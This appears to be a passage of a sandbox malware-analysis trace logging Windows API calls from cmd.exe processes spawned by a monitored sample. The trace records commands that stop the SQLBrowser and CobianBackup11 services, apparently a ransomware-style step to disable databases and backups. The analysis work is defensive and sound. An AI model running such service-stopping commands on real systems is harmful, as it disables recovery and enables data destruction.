returned 4 [0069.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0069.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0069.646] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0069.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0069.646] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0069.646] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0069.647] GetProcessHeap () returned 0x5a0000 [0069.647] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20c) returned 0x5b2dc0 [0069.647] GetConsoleTitleW (in: lpConsoleTitle=0x5b2dc0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.648] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.648] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0069.648] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0069.648] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0069.648] GetProcessHeap () returned 0x5a0000 [0069.648] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x400a) returned 0x5b6a38 [0069.648] GetProcessHeap () returned 0x5a0000 [0069.649] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b6a38 | out: hHeap=0x5a0000) returned 1 [0069.649] _wcsicmp (_String1="net", _String2=")") returned 69 [0069.649] _wcsicmp (_String1="FOR", _String2="net") returned -8 [0069.649] _wcsicmp (_String1="FOR/?", _String2="net") returned -8 [0069.649] _wcsicmp (_String1="IF", _String2="net") returned -5 [0069.649] _wcsicmp (_String1="IF/?", _String2="net") returned -5 [0069.649] _wcsicmp (_String1="REM", _String2="net") returned 4 [0069.649] _wcsicmp (_String1="REM/?", _String2="net") returned 4 [0069.649] GetProcessHeap () returned 0x5a0000 [0069.649] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x58) returned 0x5b2fd8 [0069.649] GetProcessHeap () returned 0x5a0000 [0069.649] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x10) returned 0x5aff00 [0069.650] GetProcessHeap () returned 0x5a0000 [0069.650] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x2a) returned 0x5b3038 [0069.650] GetConsoleTitleW (in: lpConsoleTitle=0x1cfa00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.651] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.651] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.651] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.651] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.651] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.651] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.651] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.651] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.651] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.651] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.651] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.651] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.651] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.651] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.651] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.651] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.651] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.651] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.651] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.651] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.651] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.651] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.651] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.651] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.651] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.651] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.651] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.651] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.651] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.651] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.651] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.651] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.651] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.652] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.652] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.652] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.652] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.652] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.652] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.652] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.652] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.652] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.652] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0069.652] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0069.652] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0069.652] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0069.652] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0069.652] _wcsicmp (_String1="net", _String2="CD") returned 11 [0069.652] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0069.652] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0069.652] _wcsicmp (_String1="net", _String2="REN") returned -4 [0069.652] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0069.652] _wcsicmp (_String1="net", _String2="SET") returned -5 [0069.652] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0069.652] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0069.652] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0069.652] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0069.652] _wcsicmp (_String1="net", _String2="MD") returned 1 [0069.652] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0069.652] _wcsicmp (_String1="net", _String2="RD") returned -4 [0069.652] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0069.652] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0069.652] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0069.652] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0069.652] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0069.652] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0069.652] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0069.652] _wcsicmp (_String1="net", _String2="VER") returned -8 [0069.652] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0069.653] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0069.653] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0069.653] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0069.653] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0069.653] _wcsicmp (_String1="net", _String2="START") returned -5 [0069.653] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0069.653] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0069.653] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0069.653] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0069.653] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0069.653] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0069.653] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0069.653] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0069.653] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0069.653] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0069.653] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0069.653] _wcsicmp (_String1="net", _String2="IF") returned 5 [0069.653] _wcsicmp (_String1="net", _String2="REM") returned -4 [0069.653] GetProcessHeap () returned 0x5a0000 [0069.653] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x210) returned 0x5b3070 [0069.653] GetProcessHeap () returned 0x5a0000 [0069.653] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x32) returned 0x5b3288 [0069.653] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0069.653] GetProcessHeap () returned 0x5a0000 [0069.653] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x418) returned 0x5a07f0 [0069.653] SetErrorMode (uMode=0x0) returned 0x0 [0069.654] SetErrorMode (uMode=0x1) returned 0x0 [0069.654] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5a07f8, lpFilePart=0x1cf520 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1cf520*="Desktop") returned 0x25 [0069.654] SetErrorMode (uMode=0x0) returned 0x1 [0069.654] GetProcessHeap () returned 0x5a0000 [0069.654] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5a07f0, Size=0x5c) returned 0x5a07f0 [0069.654] GetProcessHeap () returned 0x5a0000 [0069.654] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5a07f0) returned 0x5c [0069.654] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0069.654] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0069.654] GetProcessHeap () returned 0x5a0000 [0069.654] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x120) returned 0x5b32c8 [0069.654] GetProcessHeap () returned 0x5a0000 [0069.654] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x238) returned 0x5a0858 [0069.660] GetProcessHeap () returned 0x5a0000 [0069.660] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5a0858, Size=0x122) returned 0x5a0858 [0069.660] GetProcessHeap () returned 0x5a0000 [0069.660] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5a0858) returned 0x122 [0069.660] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0069.660] GetProcessHeap () returned 0x5a0000 [0069.660] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xe0) returned 0x5b33f0 [0069.661] GetProcessHeap () returned 0x5a0000 [0069.661] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5b33f0, Size=0x76) returned 0x5b33f0 [0069.661] GetProcessHeap () returned 0x5a0000 [0069.661] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5b33f0) returned 0x76 [0069.662] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.662] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1cf29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf29c) returned 0xffffffff [0069.662] GetLastError () returned 0x2 [0069.662] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x1cf29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf29c) returned 0xffffffff [0069.662] GetLastError () returned 0x2 [0069.662] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x1cf29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf29c) returned 0x5b3470 [0069.662] GetProcessHeap () returned 0x5a0000 [0069.662] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x14) returned 0x5b34b0 [0069.662] FindClose (in: hFindFile=0x5b3470 | out: hFindFile=0x5b3470) returned 1 [0069.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x1cf29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf29c) returned 0xffffffff [0069.663] GetLastError () returned 0x2 [0069.663] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cf29c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf29c) returned 0x5b3470 [0069.663] GetProcessHeap () returned 0x5a0000 [0069.663] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5b34b0, Size=0x4) returned 0x5b34b0 [0069.663] FindClose (in: hFindFile=0x5b3470 | out: hFindFile=0x5b3470) returned 1 [0069.663] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0069.663] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0069.663] GetConsoleTitleW (in: lpConsoleTitle=0x1cf794, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0069.663] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf61c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf6e4 | out: lpAttributeList=0x1cf61c, lpSize=0x1cf6e4) returned 1 [0069.663] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf61c, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf6dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf61c, lpPreviousValue=0x0) returned 1 [0069.663] GetStartupInfoW (in: lpStartupInfo=0x1cf5d8 | out: lpStartupInfo=0x1cf5d8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.663] GetProcessHeap () returned 0x5a0000 [0069.663] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x18) returned 0x5b3470 [0069.663] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0069.663] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0069.663] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0069.663] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.663] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.663] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0069.663] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0069.663] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0069.663] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0069.663] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.664] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0069.664] GetProcessHeap () returned 0x5a0000 [0069.664] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b3470 | out: hHeap=0x5a0000) returned 1 [0069.664] GetProcessHeap () returned 0x5a0000 [0069.664] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa) returned 0x5aff18 [0069.664] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.666] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SQLBrowser", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1cf678*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SQLBrowser", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf6c4 | out: lpCommandLine="net stop SQLBrowser", lpProcessInformation=0x1cf6c4*(hProcess=0x78, hThread=0x74, dwProcessId=0x9bc, dwThreadId=0x840)) returned 1 [0070.047] CloseHandle (hObject=0x74) returned 1 [0070.047] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0070.047] GetProcessHeap () returned 0x5a0000 [0070.047] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b5ef8 | out: hHeap=0x5a0000) returned 1 [0070.047] GetEnvironmentStringsW () returned 0x5b5ef8* [0070.047] GetProcessHeap () returned 0x5a0000 [0070.047] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb36) returned 0x5b40b8 [0070.048] FreeEnvironmentStringsW (penv=0x5b5ef8) returned 1 [0070.048] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0072.360] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x1cf5b8 | out: lpExitCode=0x1cf5b8*=0x2) returned 1 [0072.360] CloseHandle (hObject=0x78) returned 1 [0072.361] _vsnwprintf (in: _Buffer=0x1cf700, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf5c4 | out: _Buffer="00000002") returned 8 [0072.361] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0072.361] GetProcessHeap () returned 0x5a0000 [0072.361] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b40b8 | out: hHeap=0x5a0000) returned 1 [0072.361] GetEnvironmentStringsW () returned 0x5b40b8* [0072.361] GetProcessHeap () returned 0x5a0000 [0072.361] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb5c) returned 0x5b95a0 [0072.361] FreeEnvironmentStringsW (penv=0x5b40b8) returned 1 [0072.361] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0072.361] GetProcessHeap () returned 0x5a0000 [0072.361] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b95a0 | out: hHeap=0x5a0000) returned 1 [0072.361] GetEnvironmentStringsW () returned 0x5b40b8* [0072.361] GetProcessHeap () returned 0x5a0000 [0072.361] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb5c) returned 0x5b95a0 [0072.361] FreeEnvironmentStringsW (penv=0x5b40b8) returned 1 [0072.361] GetProcessHeap () returned 0x5a0000 [0072.361] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5aff18 | out: hHeap=0x5a0000) returned 1 [0072.361] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf61c | out: lpAttributeList=0x1cf61c) [0072.361] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.361] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0072.362] _get_osfhandle (_FileHandle=1) returned 0x7 [0072.362] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0072.362] _get_osfhandle (_FileHandle=0) returned 0x3 [0072.362] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0072.362] SetConsoleInputExeNameW () returned 0x1 [0072.362] GetConsoleOutputCP () returned 0x1b5 [0072.362] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0072.362] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.362] exit (_Code=2) Process: id = "38" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x7a59e000" os_pid = "0x99c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa18" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c net stop CobianBackup11" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 149 os_tid = 0x988 [0069.152] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f91c | out: lpSystemTimeAsFileTime=0x22f91c*(dwLowDateTime=0x9810b910, dwHighDateTime=0x1d57b18)) [0069.152] GetCurrentProcessId () returned 0x99c [0069.152] GetCurrentThreadId () returned 0x988 [0069.152] GetTickCount () returned 0x114b414 [0069.152] QueryPerformanceCounter (in: lpPerformanceCount=0x22f914 | out: lpPerformanceCount=0x22f914*=18937387842) returned 1 [0069.153] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0069.153] __set_app_type (_Type=0x1) [0069.153] __p__fmode () returned 0x74eb31f4 [0069.154] __p__commode () returned 0x74eb31fc [0069.154] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0069.154] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0069.154] GetCurrentThreadId () returned 0x988 [0069.154] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x988) returned 0x60 [0069.154] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0069.154] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadUILanguage") returned 0x76c4a84f [0069.154] SetThreadUILanguage (LangId=0x0) returned 0x409 [0069.155] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0069.155] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f8ac | out: phkResult=0x22f8ac*=0x0) returned 0x2 [0069.155] VirtualQuery (in: lpAddress=0x22f8e3, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.155] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0069.155] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0069.155] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.155] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f87c, dwLength=0x1c | out: lpBuffer=0x22f87c*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0069.155] GetConsoleOutputCP () returned 0x1b5 [0069.155] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0069.155] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0069.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.155] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0069.606] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.606] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 1 [0069.607] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.607] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0069.607] _get_osfhandle (_FileHandle=0) returned 0x3 [0069.607] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) 